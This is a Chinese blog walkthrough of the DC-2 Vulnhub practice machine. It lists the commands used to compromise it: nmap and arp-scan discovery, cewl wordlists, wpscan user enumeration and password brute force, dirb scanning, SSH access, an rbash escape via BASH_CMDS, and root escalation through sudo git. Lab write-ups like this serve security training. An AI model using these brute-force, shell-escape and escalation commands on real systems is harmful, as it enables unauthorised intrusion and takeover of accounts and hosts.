【DC系列】DC-2靶机渗透练习

最新推荐文章于 2024-03-20 23:38:08 发布
最新推荐文章于 2024-03-20 23:38:08 发布
阅读量299 收藏
点赞数
分类专栏: 渗透测试 DC系列靶场 文章标签: mysql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/serendipity1130/article/details/120003525
版权

1.主机发现:sudo arp-scan -l,发现靶机ip为192.168.101.11

2.扫描端口,发现开放了80和7744端口:

nmap 192.168.101.11 -p 1-65535

3.但是访问地址发现被重定向到dc-2/,修改hosts文件,添加靶机的IP:

vi /etc/hosts

4.修改后可以访问网址发现是wordpress平台,点击进入flag

注:WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把WordPress当作一个内容管理系统(CMS)来使用。

5.页面提示了flag1要使用crew爆破,并且下一个flag2在登录后的后台中:

6.使用Cewl生成一个字典,然后使用wpscan对wordpress进行破解。

cewl http://dc-2 -w ./dc-2.txt

7.wpscan专门用于扫描wordpress的漏洞:

wpscan --url http://dc-2/

可以看到版本号为:WordPress version4.7.10

8.找登录用户(-e枚举 u用户),首先来个用户枚举,再尝试利用枚举到的用户爆破密码,枚举出三个用户名admin,jerry,tom

wpscan --url http://dc-2 -e u

9.暴力破解得登录密码

暴力破解之前,需要提供一个字典文件,上面利用cewl已得到字典

wpscan --url http://dc-2 -U jerry -P ./dc-2.txt
wpscan --url http://dc-2 -U tom -P ./dc-2.txt

 

10.有登录名和密码就找一下登录界面,使用dirb扫描一下目录:

dirb http://dc-2/

发现后台地址:访问http://dc-2/wp-admin/使用jerry账号登录

11.发现后台的提示,WordPress不能利用,找其他捷径:

12.上面访问用的80端口,还有一个7744端口,进一步探测,发现是将ssh的默认端口号改成的7744端口:

nmap -sV -p 7744 dc-2

13.所以进行ssh连接,这次使用tom的账号,使用tom登录后rbash限制(限制了可执行的命令),限制了cat和more执行,所以采用less或者vi。

ssh tom@dc-2 -p 7744

尝试绕过,暂时没找到绕过方法,但是vi可以使用,暂且使用vi查看flag3.txt内容:

rbash(restricted bash),即受限制的bash

利用以上这些特性,用于中转服务器,限制用户使用其他命令

目的:用户只能使用ssh命令,其余命令(内置命令除外)都不能使用。

可以进行rbash逃逸,就可以使用所有命令了:

参考中的方法都不能用,只能找别人复现使用的

BASH_CMDS[a]=/bin/sh;a  #调用/bin/sh命令解释器
/bin/bash   #使用bash命令解释器
export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin  #设置环境变量

14.根据flag3的提示,切换到jerry用户,找到flag4,并且提示:Go on - git outta here!!!!

15.进行git提权:

参考文章:http://evilanne.github.io/2019/07/24/sudo%E6%8F%90%E6%9D%83/

sudo git help status
!/bin/bash

执行sudo –l可以很明显的看到git提权的提示,可以看到无需root权限,jerry可以使用git!

16.使用git命令提权sudo git -p –help进入交互模式

!/bin/bash提权:

16.找到最后一个flag:

malloc_冲!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶场 DC系列 DC-2靶场
sdfsergfr的博客
12-12 712
Vulnhub靶场 DC系列 DC-2靶场
6.100个渗透测试实战#6(DC—2)
qwsn
03-26 2614
世间一切皆可努力 感谢浏览 目录...
DC靶机1-9
qq_60905276的博客
01-22 4681
1.DC1 首先我们不知道靶机的ip地址,我们通过
DC-2靶场渗透测试实验整理
u013930899的博客
09-15 1872
dc-2实验
DC-2靶机
qq_40646572的博客
05-04 1896
信息搜集 通过nmap扫描,发现dc2靶机存在80端口以及7744端口。 通过nmap中的-sV指令发现7744端口是ssh端口。 通过nmap中的script的脚本扫描,发现用户名,先保存下。 打开dc2靶机,发现dns解析错误。配置下hosts文件。 Flag搜集 找到flag1。提示使用cewl爬取单词生成字典。 可能存在Ssh爆破,或者http爆破。 经过目录扫描,发现后台。 通过hydra工具爆破http服务。获取到两个登录用户。 存在两个账号: useraname:
DC-2靶机进行渗透测试
zll___的博客
03-11 764
DC-2靶机进行渗透测试
WPscan工具使用
有勇气的牛排博客
07-22 771
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。该扫描器可以实现获取Wordpress。
DC-2靶机渗透测试(cewl,wpscan,hydra爆破,rbash逃逸,vi提权,git提权)
single_g_l的博客
03-17 2698
目录 一. 环境 二. 信息收集(识别目标主机,端口,拿到flag1) 01. 主机发现 02.访问地址192.168.1.8:80 03. 注意到nmap扫描时有这样一个提示,基本可以确认需要手动配置hosts文件 04. 配置hosts文件,再次访问,拿到flag1 ​三. wpscan枚举,cwel生成字典,爆破获取密码,登录用户,拿到flag2 01. 使用cewl生成密码 02. 确定是wordpress,使用wpscan工具扫描,枚举出了用户 03. wpscan爆破拿到..
vulnhub靶机渗透DC-2
RestoreJustice的博客
03-17 123
根据flag1的提示,我们知道可以通过爬取网站内容来生成字典,爆破后台,这里我们使用wpscan来提取用户名,wpscan是专门最对wordpress的扫描器,命令:wpscan --url dc-2 -e u。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.129。命令:cewl dc-2 -w pds.txt。使用wpscan爆破:wpscan --url dc-2 -U user.txt -P pds.txt。
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 2753
DC-2靶机渗透测试思路及流程
DC-2的靶机渗透
m0_74950307的博客
10-18 70
在终端中使用 export PATH=$PATH:/usr/bin/ 命令可以将 /usr/bin/ 目录添加到环境变量 PATH 中。这样,系统将在执行命令时搜索 /usr/bin/ 目录,从而使你能够执行位于 /usr/bin/ 目录下的可执行文件。在终端中使用 export PATH=$PATH:/bin 命令可以将 /bin 目录添加到环境变量 PATH 中。这样,系统将在执行命令时搜索 /bin 目录,从而使你能够执行位于 /bin 目录下的可执行文件。翻译它:可怜的老汤姆总是追着杰瑞跑。
DC-2靶机渗透全流程详细
最新发布
qq_63940076的博客
03-20 1702
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
wpscan基础用法
Soul Blog
11-21 1074
wpscan 简单介绍wpscan的常用方法 --url 网站url --disable-tls-checks 不做TLS检查,https协议绕过 --api-token 令牌,需在官网获得,没令牌看不到插件漏洞 --plugins-detection 三个可选项:mixed, passive(默认), aggressive, 每个选项都试下,防止插件不被扫出 -e p(枚举插件) vp(枚举插件漏洞) 参考手册 Usage: wpscan [options]
Wordpress漏洞利用&WPscan使用
Love&Share
11-17 8903
WordPress是一个开源的内容管理系统(CMS),在全球范围内使用比较广泛,但遇到一个WP站点时可以首先用WPscan进行扫描收集信息 WPscan WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞,在遇到wp站点时可以扫描一下 1、刺探基础信息: wpscan --url http://www.example.com 2、猜解后台用户名 wpscan --url.
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3609
前言 这次练习靶机是vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
DC-2靶机渗透学习
里丘~班诺的小屋
09-01 1427
目录 0X00 靶机的环境搭配 0X01战前准备 一、IP扫描 二、端口扫描 三、网站目录扫描 四、查看网站结构 三、渗透开始 一、flag1 二、flag2 2.1 使用cewl生成密码 2.2 使用wpscan扫出用户 2.3 找到3个用户admin、jerry、tom,并将他们放入一个文本文件中 2.4 开始爆破 2.5登录后台网页 三、flag3 3.1 ssh登录 3.2 初步查找文件 四、flag4 4.1 绕过rbash 五、flag5 5.1..
DC-2靶机渗透
weixin_45349299的博客
01-02 672
title: DC-2靶机渗透详解 date: 2022-1-1 23 :38 :36 tags: DC系列靶机 categories: 学习笔记kali攻击机:192.168.1.103靶机:192.168.2.102,以10000的速率扫描靶机的所有端口,对指定端口的服务做综合详细扫描打不开192.168.2.108:80的原因:没有在本地设置hosts本地hosts文件位置:C:\Windows\System32\drivers\etc添加192.168.2.102 dc-2然后用更新dns缓存查询D
TCP注册端口号大全7
热门推荐
yyfpeak的专栏
03-02 3万+
afs3-fileserver 7000/tcp file server itself afs3-fileserver 7000/udp file server itself afs3-callback 7001/tcp callbacks to cache managers afs3-callback 7001/udp callbacks to cache man
dc-2 靶机渗透学习
..
03-15 1319
网络扫描 第一步先查看当前网段,进行主机探活 nmap -A -p- -v 192.168.202.0/24 发现80、7744端口开放 访问192.168.202.131来看看网站的80端口是啥,可以看到提示不能连接dc-2 造成这样的原因感觉是访问192.168.202.131时,发生了一次跳转到http://dc-2域名,而我们本地的host文件没有对应域名的ip,所以导致访问不成功。 以root身份打开/etc/hosts文件,添加如下内容: 192.168.2
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值